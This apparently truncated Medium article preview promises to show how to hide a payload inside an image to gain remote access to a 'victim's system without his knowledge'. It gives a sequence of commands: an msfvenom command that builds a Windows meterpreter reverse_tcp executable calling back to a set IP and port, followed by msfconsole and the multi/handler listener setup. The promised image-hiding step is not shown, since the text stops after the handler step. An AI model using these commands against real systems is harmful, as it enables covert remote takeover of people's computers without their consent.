Member-only story

Steganography: Hiding payload behind Image

Vijay Kumar Gupta
3 min readJul 14, 2024

--

Steganography: Hiding payload behind the image

In this article, we’ll look at how to hide our payload within an image. This will allow us to gain remote access to our victim’s system without his knowledge.

Steganography is the process of concealing a payload or anything else behind any media or file.

Steps 1. Let’s check our IP address:-

Ifconfig

Step 2. Create a payload

msfvenom -p windows/meterpreter/reverse_tcp lhost 192.168.128.128 lport 4444 -f exe > /home/lucifer/Desktop/test.exe

Step 3. Open Listener

msfconsole

Step 4. Set handler

use exploit/multi/handler

--

--

Vijay Kumar Gupta
Vijay Kumar Gupta

Written by Vijay Kumar Gupta

Vijay Gupta is an inspiring public speaker and social entrepreneur who has dedicated his life to bringing about positive change and empowering communities.

No responses yet